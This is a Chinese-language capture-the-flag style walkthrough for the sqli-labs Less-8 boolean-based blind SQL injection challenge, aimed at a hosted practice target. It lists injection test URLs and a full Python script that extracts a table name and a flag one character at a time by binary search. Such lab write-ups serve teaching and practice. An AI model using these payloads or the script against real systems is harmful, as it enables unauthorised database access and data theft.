Less-8

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

1.判断是否存在注入

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1'

 错误回显 => 存在注入

2.判断参数类型

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1 and 1=2

正常回显 => 字符型

3.进行参数闭合

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=2 --+

错误回显

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 3 --+

正确回显

https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 4 --+

错误回显 => 3位显示位

5.进行布尔盲注

python脚本

import requests
import time

a = time.time()
c = ''


def table_name():
    a = ''
    global c
    for i in range(1, 9):
        # 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (
                i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (
                    i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    break

    print('table_name:' + a)
    c = a


def flag():
    a = ''
    for i in range(1, 43):
        # 48 ~ 122
        low = 1
        high = 128
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            #print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))<%d  -- 1" % (i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    print(a)
                    break

    print('flag:' + a)


if __name__ == '__main__':
    urls = 'https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/'
    # database_name()
    table_name()  # //找到了数据库名就修改一下上面的代码，然后开启就行
    # coulmn_name()
    flag()

    b = time.time()
    print('折半查找法 ：Running time: %s Seconds' % (b - a))